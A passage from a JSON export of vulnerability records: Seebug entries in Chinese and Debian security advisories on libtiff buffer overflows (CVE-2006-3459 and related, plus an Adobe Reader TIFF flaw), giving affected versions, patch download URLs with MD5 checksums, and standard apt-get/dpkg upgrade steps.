href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_powerpc.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_powerpc.deb</a>\r\nSize/MD5 checksum: 235624 2d13e7c1769aab6d8a051817009d10ca\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_powerpc.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_powerpc.deb</a>\r\nSize/MD5 checksum: 461300 94dddf225b2130da2daca1ec54b2c0b0\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_powerpc.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_powerpc.deb</a>\r\nSize/MD5 checksum: 272868 0517f72923504549f4acf0fab1e1924f\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_powerpc.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_powerpc.deb</a>\r\nSize/MD5 checksum: 42658 9dd0f68f37713263bc9a729d7216b35f\r\n\r\nIBM S/390 architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_s390.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_s390.deb</a>\r\nSize/MD5 checksum: 46422 039bfe0dde0063b276a57c1414a6d9ca\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_s390.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_s390.deb</a>\r\nSize/MD5 checksum: 214056 b87d71aa653f45726d3b4ecd60b226b3\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_s390.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_s390.deb</a>\r\nSize/MD5 checksum: 466474 6b6e2dd8152760e65d2af459deac62fc\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_s390.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_s390.deb</a>\r\nSize/MD5 checksum: 267648 fc8d5662348991874f47953f20102b38\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_s390.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_s390.deb</a>\r\nSize/MD5 checksum: 41078 090b4edea314fadf183bb31fd891be34\r\n\r\nSun Sparc architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_sparc.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_sparc.deb</a>\r\nSize/MD5 checksum: 45706 955588f87bf3796b962c6f18ad5ecbb3\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_sparc.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_sparc.deb</a>\r\nSize/MD5 checksum: 205502 710eb39e993e988dcc1abc5cefd2f559\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_sparc.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_sparc.deb</a>\r\nSize/MD5 checksum: 455492 76e4acd2000175c52d60f6b6f53aaa25\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_sparc.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_sparc.deb</a>\r\nSize/MD5 checksum: 258764 c33aacda7a8162ff5ba7fd9399e347a6\r\n<a href=\"http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_sparc.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_sparc.deb</a>\r\nSize/MD5 checksum: 40806 cefaef4ab3ed03fdeeec97a40081721f\r\n\r\n\u8865\u4e01\u5b89\u88c5\u65b9\u6cd5\uff1a\r\n\r\n1. \u624b\u5de5\u5b89\u88c5\u8865\u4e01\u5305\uff1a\r\n\r\n \u9996\u5148\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u6765\u4e0b\u8f7d\u8865\u4e01\u8f6f\u4ef6\uff1a\r\n # wget url (url\u662f\u8865\u4e01\u4e0b\u8f7d\u94fe\u63a5\u5730\u5740)\r\n\r\n \u7136\u540e\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u6765\u5b89\u88c5\u8865\u4e01\uff1a \r\n # dpkg -i file.deb (file\u662f\u76f8\u5e94\u7684\u8865\u4e01\u540d)\r\n\r\n2. \u4f7f\u7528apt-get\u81ea\u52a8\u5b89\u88c5\u8865\u4e01\u5305\uff1a\r\n\r\n \u9996\u5148\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u66f4\u65b0\u5185\u90e8\u6570\u636e\u5e93\uff1a\r\n # apt-get update\r\n \r\n \u7136\u540e\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u5b89\u88c5\u66f4\u65b0\u8f6f\u4ef6\u5305\uff1a\r\n # apt-get upgrade\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2006:0603-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2006:0603-01\uff1aImportant: libtiff security update\r\n\u94fe\u63a5\uff1a<a href=\"http://lwn.net/Alerts/194067\" target=\"_blank\">http://lwn.net/Alerts/194067</a>", "modified": "2006-11-04T00:00:00", "published": "2006-11-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-405", "id": "SSV:405", "title": "Libtiff\u56fe\u5f62\u5e93\u591a\u4e2a\u5b89\u5168\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T18:18:27", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 38195\r\nCVE ID: CVE-2010-0188,CVE-2006-3459\r\n\r\nAdobe Reader\u548cAcrobat\u90fd\u662f\u975e\u5e38\u6d41\u884c\u7684PDF\u6587\u4ef6\u9605\u8bfb\u5668\u3002\r\n\r\nAdobe Reader\u548cAcrobat\u91c7\u7528\u7684\u5f00\u6e90TIFF\u56fe\u50cf\u89e3\u6790\u5e93libtiff\u5b9e\u73b0\u4e0a\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u901a\u8fc7\u8bf1\u4f7f\u7528\u6237\u6253\u5f00\u5904\u7406\u5305\u542b\u6076\u610fTIFF\u56fe\u50cf\u7684PDF\u6587\u6863\u5728\u7528\u6237\u7cfb\u7edf\u4e0a\u6267\u884c\u4efb\u610f\u6307\u4ee4\uff0c\u4ece\u800c\u63a7\u5236\u7528\u6237\u7cfb\u7edf\u3002\r\n\r\n\u6b64\u5b89\u5168\u95ee\u9898\u5176\u5b9e\u662f\u4e00\u4e2a\u8001\u6f0f\u6d1e\uff08CVE-2006-3459\uff09\u5728Adobe\u4ea7\u54c1\u4e2d\u7684\u91cd\u73b0\u3002\n\nAdobe Acrobat < 9.3.1\r\nAdobe Acrobat < 8.2.1\r\nAdobe Reader < 9.3.1\r\nAdobe Reader < 8.2.1\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u7981\u6b62\u6d4f\u89c8\u5668\u81ea\u52a8\u6253\u5f00PDF\u6587\u6863\u3002\r\n* \u7981\u7528JavaScript\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nAdobe\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.adobe.com/support/security/bulletins/apsb10-07.html", "modified": "2010-02-20T00:00:00", "published": "2010-02-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19156", "id": "SSV:19156", "title": "Adobe Reader\u548cAcrobat TIFF\u56fe\u50cf\u5904\u7406\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "debian": [{"lastseen": "2019-05-30T02:22:49", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1137-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nAugust 2nd, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : tiff\nVulnerability : several\nProblem type : local (remote)\nDebian-specific: no\nCVE IDs : CVE-2006-3459 CVE-2006-3460 CVE-2006-3461 CVE-2006-3462\n CVE-2006-3463 CVE-2006-3464 CVE-2006-3465\n\nTavis Ormandy of the Google Security Team discovered several problems\nin the TIFF library. The Common Vulnerabilities and Exposures project\nidentifies the following issues:\n\nCVE-2006-3459\n\n Several stack-buffer overflows have been discovered.\n\nCVE-2006-3460\n\n A heap overflow vulnerability in the JPEG decoder may overrun a\n buffer with more data than expected.\n\nCVE-2006-3461\n\n A heap overflow vulnerability in the PixarLog decoder may allow an\n attacker to execute arbitrary code.\n\nCVE-2006-3462\n\n A heap overflow vulnerability has been discovered in the NeXT RLE\n decoder.\n\nCVE-2006-3463\n\n An loop was discovered where a 16bit unsigned short was used to\n iterate over a 32bit unsigned value so that the loop would never\n terminate and continue forever.\n\nCVE-2006-3464\n\n Multiple unchecked arithmetic operations were uncovered, including\n a number of the range checking operations designed to ensure the\n offsets specified in TIFF directories are legitimate.\n\nCVE-2006-3465\n\n A flaw was also uncovered in libtiffs custom tag support which may\n result in abnormal behaviour, crashes, or potentially arbitrary\n code execution.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 3.7.2-7.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 3.8.2-6.\n\nWe recommend that you upgrade your libtiff packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given at the end of this advisory:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/t/tiff/tiff_3.7.2-7.dsc\n Size/MD5 checksum: 736 ce0ffb8cdd1130153deaefa8b59abe81\n http://security.debian.org/pool/updates/main/t/tiff/tiff_3.7.2-7.diff.gz\n Size/MD5 checksum: 17174 ff485016221ededfc8ce649538322211\n http://security.debian.org/pool/updates/main/t/tiff/tiff_3.7.2.orig.tar.gz\n Size/MD5 checksum: 1252995 221679f6d5c15670b3c242cbfff79a00\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_alpha.deb\n Size/MD5 checksum: 47112 a4f7feea087ba03a84f745ee79a7ff56\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_alpha.deb\n Size/MD5 checksum: 243840 f7abb618f36082be959f6e3c9a99cf8f\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_alpha.deb\n Size/MD5 checksum: 479064 c137c6857ed320928f182115fbd94b21\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_alpha.deb\n Size/MD5 checksum: 311206 c202ef6404c23ea7dc999c03e586c07f\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_alpha.deb\n Size/MD5 checksum: 41228 53c5979e8c2556e5a19607c19e862368\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_amd64.deb\n Size/MD5 checksum: 46036 bc6d0c7db57a1dcae4b8dd65b4640243\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_amd64.deb\n Size/MD5 checksum: 218060 d09ef1de8b31f074d2f05c7522858cf1\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_amd64.deb\n Size/MD5 checksum: 459964 8be097d74ac788d87a8358b8f9e68d79\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_amd64.deb\n Size/MD5 checksum: 267872 cc0a4241cd53de29b561286fcd91cf2c\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_amd64.deb\n Size/MD5 checksum: 40804 136bc49ad0c85dc6fa9f61242cf97c05\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_arm.deb\n Size/MD5 checksum: 45536 0253b94c6f94a33c9942568f9093fedd\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_arm.deb\n Size/MD5 checksum: 208630 45e2ef6af43bfbddb4aee00b659d287a\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_arm.deb\n Size/MD5 checksum: 454194 354e1b4560b4a407c4b4faf5d2555b20\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_arm.deb\n Size/MD5 checksum: 266148 f535b441d81a7786815d954c843b9c81\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_arm.deb\n Size/MD5 checksum: 40304 fcd0980c8fc2dedaa8a6380e0d4736bd\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_i386.deb\n Size/MD5 checksum: 45400 e51d8f157a2ef94cbc4e893f756be29a\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_i386.deb\n Size/MD5 checksum: 206412 69a3c66b2c9733653e6e7f667ab260b3\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_i386.deb\n Size/MD5 checksum: 453078 267f8f361f0dc87f40c8bc37d4785f57\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_i386.deb\n Size/MD5 checksum: 252412 5720af1515d6c9ce04f0e7abea045955\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_i386.deb\n Size/MD5 checksum: 40850 18710ba8ae073bd5a6e7b3c299cbae23\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_ia64.deb\n Size/MD5 checksum: 48512 c57280d747f62859c4477a0f1dcbcfef\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_ia64.deb\n Size/MD5 checksum: 269156 277ad4a79cd2148991134c6ed8c029fe\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_ia64.deb\n Size/MD5 checksum: 511782 4b64fd28c917e7e2e158c7244cfc892d\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_ia64.deb\n Size/MD5 checksum: 331790 614a46318d671800caab21e26df9c1bf\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_ia64.deb\n Size/MD5 checksum: 42450 af80a3234e174d9f15bbb4e68d2b558f\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_hppa.deb\n Size/MD5 checksum: 46846 e863b11db8f25a221776ea306eeb1539\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_hppa.deb\n Size/MD5 checksum: 230316 9ccb777cf49096a2dabf144de609b83c\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_hppa.deb\n Size/MD5 checksum: 473764 6938692095c40fba1f5feca1efd243a8\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_hppa.deb\n Size/MD5 checksum: 282648 68ffb8ebaac2404aa1f9a709e83abfc6\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_hppa.deb\n Size/MD5 checksum: 41476 4327a6e2887ab7d5bb69d0476186d69e\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_m68k.deb\n Size/MD5 checksum: 45408 e33d428b54a5776181803c28475e2a30\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_m68k.deb\n Size/MD5 checksum: 193578 d7f3db57205002a50354df9cc1e74767\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_m68k.deb\n Size/MD5 checksum: 443280 2e982f2b17745777ff6e249f627b1b4c\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_m68k.deb\n Size/MD5 checksum: 235056 c362aaa8589f44a3dc533143c37fd16b\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_m68k.deb\n Size/MD5 checksum: 40450 279a59887fd7a90b9d92415a07fe87f1\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_mips.deb\n Size/MD5 checksum: 46300 c26b165f7098aa083170b90c8002406e\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_mips.deb\n Size/MD5 checksum: 252404 77b6d4382ee49bab1d3b94ea69d3bd88\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_mips.deb\n Size/MD5 checksum: 459088 34e8d02f8bac8bc4b059bc36109dda66\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_mips.deb\n Size/MD5 checksum: 281156 c2bf726c93de2c1ce1cb289d65fec892\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_mips.deb\n Size/MD5 checksum: 41086 85b8389df1df050f12fd87488ab46c02\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_mipsel.deb\n Size/MD5 checksum: 46256 8a1cc8fbd9e7679f2ec722f46a300fe1\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_mipsel.deb\n Size/MD5 checksum: 252820 876a24a6b4b49d19eb2d425f7271528e\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_mipsel.deb\n Size/MD5 checksum: 459392 f1d09bb13a31f8ec73922f50d538b073\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_mipsel.deb\n Size/MD5 checksum: 280986 eff50ab58f511148d9d56ecbbc02c162\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_mipsel.deb\n Size/MD5 checksum: 41066 7490a101b2de00f6f458359f64b05daa\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_powerpc.deb\n Size/MD5 checksum: 47462 3eaaac85e15b48dd1add1fb314de9b74\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_powerpc.deb\n Size/MD5 checksum: 235624 2d13e7c1769aab6d8a051817009d10ca\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_powerpc.deb\n Size/MD5 checksum: 461300 94dddf225b2130da2daca1ec54b2c0b0\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_powerpc.deb\n Size/MD5 checksum: 272868 0517f72923504549f4acf0fab1e1924f\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_powerpc.deb\n Size/MD5 checksum: 42658 9dd0f68f37713263bc9a729d7216b35f\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_s390.deb\n Size/MD5 checksum: 46422 039bfe0dde0063b276a57c1414a6d9ca\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_s390.deb\n Size/MD5 checksum: 214056 b87d71aa653f45726d3b4ecd60b226b3\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_s390.deb\n Size/MD5 checksum: 466474 6b6e2dd8152760e65d2af459deac62fc\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_s390.deb\n Size/MD5 checksum: 267648 fc8d5662348991874f47953f20102b38\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_s390.deb\n Size/MD5 checksum: 41078 090b4edea314fadf183bb31fd891be34\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-7_sparc.deb\n Size/MD5 checksum: 45706 955588f87bf3796b962c6f18ad5ecbb3\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-7_sparc.deb\n Size/MD5 checksum: 205502 710eb39e993e988dcc1abc5cefd2f559\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-7_sparc.deb\n Size/MD5 checksum: 455492 76e4acd2000175c52d60f6b6f53aaa25\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-7_sparc.deb\n Size/MD5 checksum: 258764 c33aacda7a8162ff5ba7fd9399e347a6\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-7_sparc.deb\n Size/MD5 checksum: 40806 cefaef4ab3ed03fdeeec97a40081721f\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "modified": "2006-08-02T00:00:00", "published": "2006-08-02T00:00:00", "id": "DEBIAN:DSA-1137-1:DC957", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00226.html", "title": "[SECURITY] [DSA 1137-1] New tiff packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-30T02:21:50", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1091-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nJune 8th, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : tiff\nVulnerability : buffer overflows\nProblem type : none or remote\nDebian-specific: no\nCVE ID : CVE-2006-2656 CVE-2006-2193\nDebian Bug : 369819\n\nSeveral problems have been discovered in the TIFF library. The Common\nVulnerabilities and Exposures project identifies the following issues:\n\nCVE-2006-2193\n\n SuSE discovered a buffer overflow in the conversion of TIFF files\n into PDF documents which could be exploited when tiff2pdf is used\n e.g. in a printer filter.\n\nCVE-2006-2656\n\n The tiffsplit command from the TIFF library contains a buffer\n overflow in the commandline handling which could be exploited when\n the program is executed automatically on unknown filenames.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 3.5.5-7woody2.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 3.7.2-5.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 3.8.2-4.\n\nWe recommend that you upgrade your tiff packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given at the end of this advisory:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/t/tiff/tiff_3.5.5-7woody2.dsc\n Size/MD5 checksum: 635 63c05c844a00a57f87f1804dc668ccbf\n http://security.debian.org/pool/updates/main/t/tiff/tiff_3.5.5-7woody2.diff.gz\n Size/MD5 checksum: 38682 5905ba8ea39b409b4aa2893b697f35bc\n http://security.debian.org/pool/updates/main/t/tiff/tiff_3.5.5.orig.tar.gz\n Size/MD5 checksum: 693641 3b7199ba793dec6ca88f38bb0c8cc4d8\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7woody2_alpha.deb\n Size/MD5 checksum: 141478 2e995b46f312ecf35858f06e50c2ae2e\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7woody2_alpha.deb\n Size/MD5 checksum: 106182 c383b1a1f292525e60efa68750bda5ae\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7woody2_alpha.deb\n Size/MD5 checksum: 423868 da0015dd297de4f4128488fca92c3a88\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7woody2_arm.deb\n Size/MD5 checksum: 117012 fe039271e5e9a94f56a2ca4c8a38a373\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7woody2_arm.deb\n Size/MD5 checksum: 91610 d52006c179bfc3a13a779dfab1afa8fd\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7woody2_arm.deb\n Size/MD5 checksum: 404850 69dd0252a4e15f0bc84ddb0d53ce5c96\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7woody2_i386.deb\n Size/MD5 checksum: 112058 cc978252d32d2e853ed08a655940b15b\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7woody2_i386.deb\n Size/MD5 checksum: 82070 22733411e25f7fac444f148dcfb685a7\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7woody2_i386.deb\n Size/MD5 checksum: 387442 dc8f36b0bfed0cc69d53c14f6b6e2fd4\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7woody2_ia64.deb\n Size/MD5 checksum: 158834 dda97df687d64fef045e7dd425a9b01e\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7woody2_ia64.deb\n Size/MD5 checksum: 136678 e43c8ca8bcbdb54d09cee79f7c2f5665\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7woody2_ia64.deb\n Size/MD5 checksum: 447048 100db6566cc42766d93fd67913834096\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7woody2_hppa.deb\n Size/MD5 checksum: 128284 43c94055d54efb3d3d0708f527617ca8\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7woody2_hppa.deb\n Size/MD5 checksum: 107708 089f41dfe3629250ddc02cbe1c76c649\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7woody2_hppa.deb\n Size/MD5 checksum: 420730 018d785c7890016dfab3cba41e949dc5\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7woody2_m68k.deb\n Size/MD5 checksum: 107282 1719b7463ef81d07075c39453f793080\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7woody2_m68k.deb\n Size/MD5 checksum: 80748 2020a4999f141c2b5ba47090c551de36\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7woody2_m68k.deb\n Size/MD5 checksum: 380718 d75aa876cef53d488178caae1dc160f2\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7woody2_mips.deb\n Size/MD5 checksum: 124022 7deeb5d1d0b5eb2c536143949e507fb0\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7woody2_mips.deb\n Size/MD5 checksum: 88820 ef4eed05b2bb2f853c74997141bab9e6\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7woody2_mips.deb\n Size/MD5 checksum: 411210 d9a0dd8ae266524ff80efcd88e74365a\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7woody2_mipsel.deb\n Size/MD5 checksum: 123536 88738fa15be0cb199c006503a12e13df\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7woody2_mipsel.deb\n Size/MD5 checksum: 89122 beaf555e5d72f290852777b750a676cc\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7woody2_mipsel.deb\n Size/MD5 checksum: 411326 61a6b79d2fd527d1c3fcd41eac1bd408\n\n PowerPC architecture:\n\n 